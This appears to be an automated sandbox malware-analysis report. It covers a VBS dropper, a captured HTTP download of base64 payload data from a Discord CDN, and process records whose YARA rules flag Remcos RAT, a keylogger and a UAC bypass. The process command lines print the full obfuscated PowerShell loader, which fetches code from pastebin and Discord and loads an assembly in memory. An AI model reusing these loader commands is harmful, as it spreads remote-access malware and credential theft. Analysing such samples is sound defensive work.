                                                                              2024-10-31 06:43:16 UTC222OUTGET /attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826a&is=672230ea&hm=1e5ddde8edfd2b0b55a1936b9b2cf98999ca75e818b8e4dadd7bc75ebedbbd24& HTTP/1.1
                                                                              Host: cdn.discordapp.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-31 06:43:16 UTC1194INHTTP/1.1 200 OK
                                                                              Date: Thu, 31 Oct 2024 06:43:16 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 658776
                                                                              Connection: close
                                                                              CF-Ray: 8db1ab7c98ee3ac4-DFW
                                                                              CF-Cache-Status: HIT
                                                                              Accept-Ranges: bytes, bytes
                                                                              Age: 59935
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Disposition: attachment; filename="este2.txt"
                                                                              ETag: "56f982cc88538a2da7f7df5b6a3081e1"
                                                                              Expires: Fri, 31 Oct 2025 06:43:16 GMT
                                                                              Last-Modified: Fri, 25 Oct 2024 13:13:14 GMT
                                                                              Vary: Accept-Encoding
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              x-goog-generation: 1729861994223450
                                                                              x-goog-hash: crc32c=7npwLw==
                                                                              x-goog-hash: md5=VvmCzIhTii2n999bajCB4Q==
                                                                              x-goog-metageneration: 1
                                                                              x-goog-storage-class: STANDARD
                                                                              x-goog-stored-content-encoding: identity
                                                                              x-goog-stored-content-length: 658776
                                                                              x-guploader-uploadid: AHmUCY3zqKLqYDT5MOxN9YEYgAqPwN7-v5gPvACE_TkRXGCVnCprKS-Y7C4cS4efk0cls8943tCCVyaBRQ
                                                                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                              Set-Cookie: __cf_bm=K4gnRqd1EbgjnDWvOgDtGMr.d9grfk9mReeYQaWXMhg-1730356996-1.0.1.1-cTTe6QwPUIXstof080PXHWSbxJjv9mUxXyRDmMYZnSlD.06_Cd.gCZ7t2hamaKrha.MtyFlgnrMLKZZvBhsHMw; path=/; expires=Thu, 31-Oct-24 07:13:16 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                              2024-10-31 06:43:16 UTC519INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4d 77 61 35 57 65 35 4c 33 74 79 53 6f 4d 51 79 4b 44 61 25 32 46 6c 41 52 70 25 32 42 5a 51 32 4d 79 44 75 25 32 42 31 67 6e 56 25 32 42 77 35 6b 72 6a 7a 30 51 75 68 76 75 73 69 58 68 4f 39 42 4f 50 33 30 46 55 77 52 36 71 48 35 57 77 45 4f 4b 4c 30 47 7a 69 45 39 4b 45 72 73 6f 7a 68 4b 48 47 63 66 54 62 25 32 42 49 72 69 66 57 56 4c 70 48 79 77 6a 5a 4a 41 39 41 4c 4d 67 73 33 59 71 38 6b 76 48 49 33 56 6f 41 57 79 55 50 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61
                                                                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mwa5We5L3tySoMQyKDa%2FlARp%2BZQ2MyDu%2B1gnV%2Bw5krjz0QuhvusiXhO9BOP30FUwR6qH5WwEOKL0GziE9KErsozhKHGcfTb%2BIrifWVLpHywjZJA9ALMgs3Yq8kvHI3VoAWyUPQ%3D%3D"}],"group":"cf-nel","max_a
                                                                              2024-10-31 06:43:16 UTC1369INData Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41
                                                                              Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBA
                                                                              2024-10-31 06:43:16 UTC1369INData Raw: 67 62 4e 30 57 44 73 31 77 61 4e 6f 57 44 6e 31 67 5a 4e 55 57 44 6b 31 77 59 4e 49 57 44 68 31 41 59 4e 38 56 44 65 31 51 58 4e 77 56 44 62 31 67 57 4e 6b 56 44 59 31 77 56 4e 59 56 44 56 31 41 56 4e 4d 56 44 53 31 51 55 4e 41 56 44 50 31 67 54 4e 30 55 44 4d 31 77 53 4e 6f 55 44 4a 31 41 53 4e 63 55 44 47 31 51 52 4e 51 55 44 44 31 67 51 4e 45 55 44 41 30 77 50 4e 34 54 44 39 30 41 50 4e 73 54 44 36 30 51 4f 4e 67 54 44 33 30 67 4e 4e 55 44 41 41 41 41 49 41 47 41 48 41 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c 44 34 79 67 74 4d 51 4c 44 79 79 41 73 4d 34 4b 44 73 79 67 71 4d 67 4b 44 6d 79 41 70 4d 49 4b 44 67
                                                                              Data Ascii: gbN0WDs1waNoWDn1gZNUWDk1wYNIWDh1AYN8VDe1QXNwVDb1gWNkVDY1wVNYVDV1AVNMVDS1QUNAVDP1gTN0UDM1wSNoUDJ1ASNcUDG1QRNQUDD1gQNEUDA0wPN4TD90APNsTD60QONgTD30gNNUDAAAAIAGAHAzg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMoLD4ygtMQLDyyAsM4KDsygqMgKDmyApMIKDg
                                                                              2024-10-31 06:43:16 UTC1369INData Raw: 5a 4e 55 57 44 6a 31 51 59 4e 38 56 44 64 31 77 57 4e 6b 56 44 42 30 77 50 4e 30 54 44 37 30 51 4f 4e 63 54 44 31 30 77 4d 4e 45 54 44 76 30 51 4c 4e 73 53 44 70 30 77 4a 4e 55 53 44 6a 30 51 49 4e 38 52 44 64 30 77 47 4e 6b 52 44 58 30 51 46 4e 4d 52 44 52 30 77 44 4e 30 51 44 4c 30 51 79 4d 49 4e 44 50 7a 41 7a 4d 6b 4d 44 47 7a 77 77 4d 41 49 44 39 79 67 75 4d 63 4c 44 30 79 51 73 4d 34 4b 44 72 79 41 71 4d 55 4b 44 69 79 77 6e 4d 77 4a 44 5a 79 67 6c 4d 4d 4a 44 51 79 41 6a 4d 6b 49 44 47 79 77 67 4d 41 45 44 39 78 67 65 4d 63 48 44 30 78 51 63 4d 34 47 44 72 78 41 61 4d 55 47 44 69 78 77 58 4d 77 46 44 5a 78 67 56 4d 4d 46 44 51 78 51 54 4d 6f 45 44 48 78 41 52 4d 45 41 44 2b 77 77 4f 4d 67 44 44 31 77 67 4d 4d 38 43 44 73 77 51 4b 4d 59 43 44 6a 77
                                                                              Data Ascii: ZNUWDj1QYN8VDd1wWNkVDB0wPN0TD70QONcTD10wMNETDv0QLNsSDp0wJNUSDj0QIN8RDd0wGNkRDX0QFNMRDR0wDN0QDL0QyMINDPzAzMkMDGzwwMAID9yguMcLD0yQsM4KDryAqMUKDiywnMwJDZyglMMJDQyAjMkIDGywgMAED9xgeMcHD0xQcM4GDrxAaMUGDixwXMwFDZxgVMMFDQxQTMoEDHxARMEAD+wwOMgDD1wgMM8CDswQKMYCDjw
                                                                              2024-10-31 06:43:16 UTC1369INData Raw: 4d 67 4b 44 6d 79 41 70 4d 49 4b 44 67 79 67 6e 4d 77 4a 44 61 79 41 6d 4d 59 4a 44 55 79 67 6b 4d 41 4a 44 4f 79 41 6a 4d 6f 49 44 49 79 67 68 4d 51 49 44 43 79 41 51 4d 34 48 44 38 78 67 65 4d 67 48 44 32 78 41 64 4d 49 48 44 77 78 67 62 4d 77 47 44 71 78 41 61 4d 59 47 44 6b 78 67 59 4d 41 47 44 65 78 41 58 4d 6f 46 44 59 78 67 56 4d 51 46 44 53 78 41 55 4d 34 45 44 4d 78 67 53 4d 67 45 44 47 78 41 52 4d 49 45 44 41 77 67 50 4d 77 44 44 36 77 41 4f 4d 59 44 44 30 77 67 4d 4d 41 44 44 75 77 41 4c 4d 6f 43 44 6f 77 67 4a 4d 51 43 44 69 77 41 49 4d 34 42 44 63 77 67 47 4d 67 42 44 57 77 41 46 4d 49 42 44 51 77 67 44 4d 77 41 44 4b 77 41 43 4d 59 41 44 45 77 67 41 4d 41 41 41 41 42 41 49 41 46 41 4c 41 2f 67 2f 50 77 2f 44 36 2f 41 2b 50 59 2f 44 30 2f 67
                                                                              Data Ascii: MgKDmyApMIKDgygnMwJDayAmMYJDUygkMAJDOyAjMoIDIyghMQIDCyAQM4HD8xgeMgHD2xAdMIHDwxgbMwGDqxAaMYGDkxgYMAGDexAXMoFDYxgVMQFDSxAUM4EDMxgSMgEDGxARMIEDAwgPMwDD6wAOMYDD0wgMMADDuwALMoCDowgJMQCDiwAIM4BDcwgGMgBDWwAFMIBDQwgDMwADKwACMYADEwgAMAAAABAIAFALA/g/Pw/D6/A+PY/D0/g
                                                                              2024-10-31 06:43:16 UTC1369INData Raw: 77 63 44 4c 33 67 79 4e 6b 63 44 43 33 51 77 4e 41 59 44 37 32 67 75 4e 6b 62 44 34 32 77 74 4e 59 62 44 31 32 41 74 4e 45 5a 44 51 32 77 6a 4e 6f 59 44 4a 32 41 69 4e 63 59 44 47 32 51 68 4e 51 59 44 44 32 41 51 4e 38 58 44 2b 31 51 66 4e 77 58 44 37 31 67 65 4e 6b 58 44 34 31 77 64 4e 59 58 44 31 31 41 64 4e 4d 58 44 79 31 51 63 4e 41 58 44 76 31 67 62 4e 30 57 44 73 31 77 61 4e 6f 57 44 70 31 41 61 4e 63 57 44 6d 31 51 5a 4e 51 57 44 6a 31 67 59 4e 45 57 44 67 31 77 58 4e 34 56 44 64 31 41 58 4e 73 56 44 61 31 51 57 4e 67 56 44 58 31 67 56 4e 55 56 44 55 31 77 55 4e 49 56 44 52 31 41 55 4e 38 55 44 4f 31 51 54 4e 77 55 44 4c 31 67 53 4e 6b 55 44 49 31 77 52 4e 59 55 44 46 31 41 52 4e 4d 55 44 43 31 41 41 41 41 45 41 62 41 55 41 6b 41 45 44 37 78 49 65
                                                                              Data Ascii: wcDL3gyNkcDC3QwNAYD72guNkbD42wtNYbD12AtNEZDQ2wjNoYDJ2AiNcYDG2QhNQYDD2AQN8XD+1QfNwXD71geNkXD41wdNYXD11AdNMXDy1QcNAXDv1gbN0WDs1waNoWDp1AaNcWDm1QZNQWDj1gYNEWDg1wXN4VDd1AXNsVDa1QWNgVDX1gVNUVDU1wUNIVDR1AUN8UDO1QTNwUDL1gSNkUDI1wRNYUDF1ARNMUDC1AAAAEAbAUAkAED7xIe
                                                                              2024-10-31 06:43:16 UTC1369INData Raw: 4a 54 56 79 59 6b 4d 47 45 44 37 41 41 41 41 34 42 51 42 41 41 41 41 41 38 44 31 2f 59 36 50 35 39 7a 5a 2f 38 30 50 47 35 54 79 2b 49 51 50 72 33 6a 33 39 45 64 50 45 33 7a 67 39 59 58 50 76 31 44 61 39 45 47 50 6b 7a 54 32 38 73 4c 50 55 79 6a 63 38 63 45 50 54 73 7a 37 37 41 2b 4f 57 76 7a 7a 36 49 76 4f 65 69 44 2b 34 49 35 4e 55 66 6a 78 33 4d 37 4e 72 65 54 6e 33 59 31 4e 4a 64 54 4e 33 4d 69 4e 37 61 54 57 31 41 61 4e 59 57 6a 69 31 6b 58 4e 73 56 54 59 31 45 53 4e 4d 51 44 2b 30 77 4f 4e 6a 53 7a 59 30 41 46 4e 75 51 44 43 7a 55 2b 4d 63 4f 7a 6c 7a 45 35 4d 4d 4f 6a 57 7a 38 67 4d 6f 4c 44 74 79 49 69 4d 50 45 54 32 78 49 61 4d 74 46 44 5a 78 59 56 4d 42 46 54 45 77 6f 50 4d 76 44 7a 32 77 41 4e 4d 4c 44 6a 71 77 30 48 41 41 41 41 73 41 51 41 38
                                                                              Data Ascii: JTVyYkMGED7AAAA4BQBAAAAA8D1/Y6P59zZ/80PG5Ty+IQPr3j39EdPE3zg9YXPv1Da9EGPkzT28sLPUyjc8cEPTsz77A+OWvzz6IvOeiD+4I5NUfjx3M7NreTn3Y1NJdTN3MiN7aTW1AaNYWji1kXNsVTY1ESNMQD+0wONjSzY0AFNuQDCzU+McOzlzE5MMOjWz8gMoLDtyIiMPET2xIaMtFDZxYVMBFTEwoPMvDz2wANMLDjqw0HAAAAsAQA8
                                                                              2024-10-31 06:43:16 UTC1369INData Raw: 44 63 39 77 56 50 52 31 44 50 39 38 53 50 6b 77 54 39 38 63 4e 50 53 7a 54 7a 38 49 4d 50 6d 79 6a 67 38 38 45 50 4b 78 54 52 38 6f 44 50 4a 73 54 35 37 41 2b 4f 62 76 44 30 37 51 37 4f 64 75 6a 67 37 30 33 4f 34 74 54 62 37 45 31 4f 42 74 44 49 37 73 78 4f 57 73 7a 43 36 6b 75 4f 58 72 54 75 36 51 72 4f 76 71 44 70 36 67 6f 4f 7a 70 54 53 36 51 6b 4f 2f 6f 44 4e 36 67 68 4f 4f 6b 7a 38 35 34 65 4f 70 6e 6a 33 35 49 63 4f 74 6d 54 69 35 51 59 4f 2f 6c 44 64 35 67 56 4f 30 6b 7a 42 35 49 41 4f 39 6a 6a 38 34 59 4e 4f 4d 6a 6a 72 34 6b 4b 4f 6b 69 54 6d 34 30 48 4f 7a 68 44 57 34 4d 46 4f 4f 68 7a 51 34 63 43 4f 64 67 6a 41 33 30 2f 4e 34 66 54 37 33 45 39 4e 48 66 44 72 33 63 36 4e 69 65 7a 6c 33 51 32 4e 41 64 7a 4f 33 59 7a 4e 72 63 6a 44 32 6f 75 4e 32
                                                                              Data Ascii: Dc9wVPR1DP98SPkwT98cNPSzTz8IMPmyjg88EPKxTR8oDPJsT57A+ObvD07Q7Odujg703O4tTb7E1OBtDI7sxOWszC6kuOXrTu6QrOvqDp6goOzpTS6QkO/oDN6ghOOkz854eOpnj35IcOtmTi5QYO/lDd5gVO0kzB5IAO9jj84YNOMjjr4kKOkiTm40HOzhDW4MFOOhzQ4cCOdgjA30/N4fT73E9NHfDr3c6Niezl3Q2NAdzO3YzNrcjD2ouN2
                                                                              2024-10-31 06:43:16 UTC1369INData Raw: 35 79 55 73 4d 68 4b 6a 6d 79 55 70 4d 6c 45 54 61 77 6f 4a 41 41 41 41 51 41 51 41 41 41 38 6a 35 2f 45 2b 50 43 37 6a 78 2b 55 71 50 42 36 6a 65 2b 55 6e 50 49 30 44 48 38 77 65 4f 51 6d 6a 68 7a 63 67 4d 67 46 44 4d 78 6f 41 4d 74 44 7a 4e 77 73 42 41 41 41 41 4d 41 4d 41 38 41 41 41 41 2f 49 38 50 6f 6d 54 61 35 59 41 4f 30 69 44 73 34 77 4b 4f 6f 69 44 70 34 41 4b 4f 63 69 44 6d 34 51 4a 4f 51 69 44 6a 34 67 49 4f 73 56 54 73 7a 51 46 41 41 41 41 4d 41 4d 41 34 41 41 41 41 32 77 6f 4e 49 61 44 68 32 41 6f 4e 38 5a 44 65 32 51 6e 4e 77 56 44 35 31 77 57 4e 6f 56 44 5a 31 41 57 4e 63 56 44 57 31 51 56 4e 51 52 44 78 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4f 30 51 44 4e 77 4d 7a 70 7a 41 7a 4d 73 4d 44 4b 7a 51 79 4d 67 4d 44 48 7a 67 78 4d 55 49
                                                                              Data Ascii: 5yUsMhKjmyUpMlETawoJAAAAQAQAAA8j5/E+PC7jx+UqPB6je+UnPI0DH8weOQmjhzcgMgFDMxoAMtDzNwsBAAAAMAMA8AAAA/I8PomTa5YAO0iDs4wKOoiDp4AKOciDm4QJOQiDj4gIOsVTszQFAAAAMAMA4AAAA2woNIaDh2AoN8ZDe2QnNwVD51wWNoVDZ1AWNcVDW1QVNQRDx0wENIRDR0AEN8QDO0QDNwMzpzAzMsMDKzQyMgMDHzgxMUI
                                                                              2024-10-31 06:43:16 UTC1369INData Raw: 2f 45 35 50 4c 2b 54 68 2f 38 33 50 36 39 44 64 2f 34 32 50 6f 39 7a 59 2f 30 31 50 58 39 54 55 2f 77 30 50 47 39 44 51 2f 6f 7a 50 31 38 7a 4c 2f 6b 79 50 6a 38 6a 48 2f 67 78 50 53 38 44 44 2f 63 77 50 42 34 6a 2b 2b 4d 76 50 74 37 44 69 39 45 61 50 56 77 54 30 38 51 4d 50 39 79 7a 74 38 45 4c 50 67 79 7a 67 38 34 47 50 6f 78 44 59 38 73 45 50 2b 77 6a 4d 38 51 79 4f 2f 6e 54 6a 35 59 59 4f 36 6c 6a 59 34 6f 4f 4f 65 6a 54 4f 34 4d 7a 4e 61 66 7a 7a 33 45 34 4e 79 64 44 62 33 51 32 4e 49 59 44 34 32 73 6c 4e 75 59 54 4b 32 51 52 4e 2f 58 7a 34 31 30 63 4e 46 58 44 76 31 73 61 4e 4d 51 54 37 30 67 4e 4e 4c 54 7a 75 30 59 4b 4e 54 52 54 52 30 77 42 4e 4a 4d 44 38 7a 55 39 4d 46 50 54 76 7a 51 36 4d 36 4e 6a 61 7a 49 32 4d 4b 4e 6a 4b 7a 6f 67 4d 5a 4c 54
                                                                              Data Ascii: /E5PL+Th/83P69Dd/42Po9zY/01PX9TU/w0PG9DQ/ozP18zL/kyPj8jH/gxPS8DD/cwPB4j++MvPt7Di9EaPVwT08QMP9yzt8ELPgyzg84GPoxDY8sEP+wjM8QyO/nTj5YYO6ljY4oOOejTO4MzNafzz3E4NydDb3Q2NIYD42slNuYTK2QRN/Xz410cNFXDv1saNMQT70gNNLTzu0YKNTRTR0wBNJMD8zU9MFPTvzQ6M6NjazI2MKNjKzogMZLT


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:02:42:59
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs"
                                                                              Imagebase:0x7ff6955f0000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:02:43:00
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\segura.vbs');powershell $Yolopolhggobek;
                                                                              Imagebase:0x7ff6e3d50000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:02:43:00
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff66e660000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:02:43:02
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));"
                                                                              Imagebase:0x7ff6e3d50000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
